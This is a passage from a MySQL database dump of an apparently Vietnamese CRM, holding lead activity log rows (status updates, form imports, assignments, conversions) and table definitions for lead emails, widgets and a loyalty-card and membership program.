(840, 214, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(841, 216, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(842, 217, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(843, 218, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(844, 219, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(845, 220, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(846, 221, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(847, 222, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(848, 223, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(849, 224, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(850, 225, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(851, 226, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(852, 227, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(853, 228, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(854, 229, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(855, 231, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(856, 232, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(857, 233, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(858, 234, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(859, 235, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(860, 236, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(861, 237, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(862, 238, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(863, 239, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(864, 240, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(865, 241, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(866, 242, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(867, 243, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(868, 244, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(869, 245, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(870, 246, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(871, 247, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(872, 248, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(873, 249, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(874, 251, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(875, 252, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(876, 253, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(877, 254, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(878, 255, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(879, 256, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(880, 257, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(881, 258, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(882, 259, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(883, 260, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(884, 261, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(885, 262, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(886, 263, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(887, 264, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(888, 265, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(889, 266, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(890, 267, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(891, 268, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(892, 269, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(893, 272, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(894, 273, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:24', 1, 'Ho Gia Phat', 0),
(895, 274, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:24', 1, 'Ho Gia Phat', 0),
(896, 275, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:24', 1, 'Ho Gia Phat', 0),
(897, 277, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:24', 1, 'Ho Gia Phat', 0),
(898, 278, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:24', 1, 'Ho Gia Phat', 0),
(899, 279, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:24', 1, 'Ho Gia Phat', 0),
(900, 280, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:24', 1, 'Ho Gia Phat', 0),
(901, 281, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:24', 1, 'Ho Gia Phat', 0),
(902, 282, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:24', 1, 'Ho Gia Phat', 0),
(903, 283, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:24', 1, 'Ho Gia Phat', 0),
(904, 284, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:24', 1, 'Ho Gia Phat', 0),
(905, 285, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:24', 1, 'Ho Gia Phat', 0),
(906, 286, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:24', 1, 'Ho Gia Phat', 0),
(907, 287, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:24', 1, 'Ho Gia Phat', 0),
(908, 290, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:24', 1, 'Ho Gia Phat', 0),
(909, 291, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:24', 1, 'Ho Gia Phat', 0),
(910, 292, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:24', 1, 'Ho Gia Phat', 0),
(911, 294, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:24', 1, 'Ho Gia Phat', 0),
(912, 295, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:24', 1, 'Ho Gia Phat', 0),
(913, 296, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:24', 1, 'Ho Gia Phat', 0),
(914, 297, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:24', 1, 'Ho Gia Phat', 0),
(915, 300, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:24', 1, 'Ho Gia Phat', 0),
(916, 301, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:24', 1, 'Ho Gia Phat', 0),
(917, 302, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:24', 1, 'Ho Gia Phat', 0),
(918, 305, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:15:\"KH Tiềm năng\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:24', 1, 'Ho Gia Phat', 0),
(920, 307, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:15:\"KH Tiềm năng\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:24', 1, 'Ho Gia Phat', 0),
(921, 308, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:15:\"KH Tiềm năng\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:24', 1, 'Ho Gia Phat', 0),
(922, 309, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:15:\"KH Tiềm năng\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:24', 1, 'Ho Gia Phat', 0),
(923, 311, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:15:\"KH Tiềm năng\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:24', 1, 'Ho Gia Phat', 0),
(924, 312, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:15:\"KH Tiềm năng\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:24', 1, 'Ho Gia Phat', 0),
(925, 313, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:15:\"KH Tiềm năng\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:24', 1, 'Ho Gia Phat', 0),
(926, 314, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:15:\"KH Tiềm năng\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:24', 1, 'Ho Gia Phat', 0),
(927, 315, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:15:\"KH Tiềm năng\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:24', 1, 'Ho Gia Phat', 0),
(928, 316, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:15:\"KH Tiềm năng\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:24', 1, 'Ho Gia Phat', 0),
(929, 317, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:15:\"KH Tiềm năng\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:24', 1, 'Ho Gia Phat', 0),
(930, 318, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:15:\"KH Tiềm năng\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:24', 1, 'Ho Gia Phat', 0),
(931, 319, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:15:\"KH Tiềm năng\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:24', 1, 'Ho Gia Phat', 0),
(932, 320, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:15:\"KH Tiềm năng\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:24', 1, 'Ho Gia Phat', 0),
(933, 321, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:24', 1, 'Ho Gia Phat', 0),
(934, 322, 'not_lead_imported_from_form', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}', '2023-09-20 10:38:10', 0, '[CRON]', 0),
(935, 322, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:77:\"<a href=\"https://hgphome.com/admin/profile/1\" target=\"_blank\">Ho Gia Phat</a>\";}', '2023-09-20 10:38:10', 0, '[CRON]', 0),
(936, 322, 'not_lead_activity_converted', 'a:1:{i:0;s:11:\"Ho Gia Phat\";}', '2023-09-20 10:38:28', 1, 'Ho Gia Phat', 0),
(937, 323, 'not_lead_imported_from_form', 'a:1:{i:0;s:20:\"Collect list Contact\";}', '2023-10-03 20:43:15', 0, '[CRON]', 0),
(938, 323, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:77:\"<a href=\"https://hgphome.com/admin/profile/1\" target=\"_blank\">Ho Gia Phat</a>\";}', '2023-10-03 20:43:20', 0, '[CRON]', 0),
(941, 325, 'not_lead_imported_from_form', 'a:1:{i:0;s:18:\"www.quattranvn.com\";}', '2023-10-11 08:38:33', 0, '[CRON]', 0),
(942, 325, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-10-11 08:38:33', 0, '[CRON]', 0),
(943, 325, 'not_lead_activity_log_attachment', 'a:1:{i:0;s:18:\"www.quattranvn.com\";}', '2023-10-11 08:38:33', 0, '[CRON]', 0),
(944, 326, 'not_lead_imported_from_form', 'a:1:{i:0;s:18:\"www.quattranvn.com\";}', '2023-12-12 11:11:50', 0, '[CRON]', 0),
(945, 326, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-12-12 11:11:50', 0, '[CRON]', 0),
(946, 326, 'not_lead_activity_log_attachment', 'a:1:{i:0;s:18:\"www.quattranvn.com\";}', '2023-12-12 11:11:50', 0, '[CRON]', 0),
(947, 327, 'not_lead_imported_from_form', 'a:1:{i:0;s:18:\"www.quattranvn.com\";}', '2023-12-26 21:06:53', 0, '[CRON]', 0),
(948, 327, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-12-26 21:06:53', 0, '[CRON]', 0),
(949, 328, 'not_lead_imported_from_form', 'a:1:{i:0;s:18:\"www.quattranvn.com\";}', '2023-12-30 00:23:33', 0, '[CRON]', 0),
(950, 328, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:73:\"<a href=\"https://hgphome.com/admin/profile/2\" target=\"_blank\">Cong Ho</a>\";}', '2023-12-30 00:23:34', 0, '[CRON]', 0),
(951, 329, 'not_lead_imported_from_form', 'a:1:{i:0;s:20:\"Collect list Contact\";}', '2024-01-29 21:33:12', 0, '[CRON]', 0),
(952, 329, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:77:\"<a href=\"https://hgphome.com/admin/profile/1\" target=\"_blank\">Ho Gia Phat</a>\";}', '2024-01-29 21:33:12', 0, '[CRON]', 0),
(953, 329, 'not_lead_activity_converted', 'a:1:{i:0;s:11:\"Ho Gia Phat\";}', '2024-01-29 21:35:49', 1, 'Ho Gia Phat', 0),
(954, 330, 'not_lead_imported_from_form', 'a:1:{i:0;s:16:\"Form_HamiltonAir\";}', '2024-01-29 21:53:46', 0, '[CRON]', 0),
(955, 330, 'not_lead_activity_assigned_from_form', 'a:1:{i:1;s:77:\"<a href=\"https://hgphome.com/admin/profile/1\" target=\"_blank\">Ho Gia Phat</a>\";}', '2024-01-29 21:53:46', 0, '[CRON]', 0),
(956, 330, 'not_lead_activity_converted', 'a:1:{i:0;s:11:\"Ho Gia Phat\";}', '2024-01-29 21:58:50', 1, 'Ho Gia Phat', 0);

-- --------------------------------------------------------

--
-- Table structure for table `tbllead_integration_emails`
--

CREATE TABLE `tbllead_integration_emails` (
  `id` int(11) NOT NULL,
  `subject` mediumtext DEFAULT NULL,
  `body` mediumtext DEFAULT NULL,
  `dateadded` datetime NOT NULL,
  `leadid` int(11) NOT NULL,
  `emailid` int(11) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tbllistemails`
--

CREATE TABLE `tbllistemails` (
  `emailid` int(11) NOT NULL,
  `listid` int(11) NOT NULL,
  `email` varchar(100) NOT NULL,
  `dateadded` datetime NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tbllist_widget`
--

CREATE TABLE `tbllist_widget` (
  `id` int(11) NOT NULL,
  `add_from` int(11) NOT NULL,
  `rel_id` int(11) DEFAULT NULL,
  `rel_type` varchar(45) DEFAULT NULL,
  `layout` varchar(45) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblloy_card`
--

CREATE TABLE `tblloy_card` (
  `id` int(11) NOT NULL,
  `name` varchar(100) NOT NULL,
  `add_from` int(11) NOT NULL,
  `date_create` date DEFAULT NULL,
  `subject_card` int(11) DEFAULT 0,
  `client_name` int(11) DEFAULT 0,
  `membership` int(11) DEFAULT 0,
  `company_name` int(11) DEFAULT 0,
  `member_since` int(11) DEFAULT 0,
  `custom_field` int(11) DEFAULT 0,
  `custom_field_content` varchar(200) DEFAULT NULL,
  `text_color` varchar(25) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;

--
-- Dumping data for table `tblloy_card`
--

INSERT INTO `tblloy_card` (`id`, `name`, `add_from`, `date_create`, `subject_card`, `client_name`, `membership`, `company_name`, `member_since`, `custom_field`, `custom_field_content`, `text_color`) VALUES
(1, 'Thẻ thành viên', 1, '2022-06-26', 1, 1, 1, 1, 1, 1, '', '');

-- --------------------------------------------------------

--
-- Table structure for table `tblloy_mbs_program`
--

CREATE TABLE `tblloy_mbs_program` (
  `id` int(11) NOT NULL,
  `program_name` varchar(200) NOT NULL,
  `add_from` int(11) NOT NULL,
  `date_create` date DEFAULT NULL,
  `voucher_code` text NOT NULL,
  `discount` varchar(30) DEFAULT NULL,
  `discount_percent` int(11) DEFAULT NULL,
  `loyalty_point_from` decimal(15,0) DEFAULT NULL,
  `loyalty_point_to` decimal(15,0) DEFAULT NULL,
  `membership` text NOT NULL,
  `start_date` date DEFAULT NULL,
  `end_date` date DEFAULT NULL,
  `note` text DEFAULT NULL,
  `voucher_value` decimal(15,2) DEFAULT 0.00,
  `formal` int(11) DEFAULT 1,
  `minium_purchase` decimal(15,2) DEFAULT 0.00
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblloy_mbs_rule`
--

CREATE TABLE `tblloy_mbs_rule` (
  `id` int(11) NOT NULL,
  `name` varchar(200) NOT NULL,
  `add_from` int(11) NOT NULL,
  `date_create` date DEFAULT NULL,
  `client_group` int(11) DEFAULT NULL,
  `client` text NOT NULL,
  `loyalty_point_from` decimal(15,0) DEFAULT NULL,
  `loyalty_point_to` decimal(15,0) DEFAULT NULL,
  `card` int(11) DEFAULT NULL,
  `description` text DEFAULT NULL
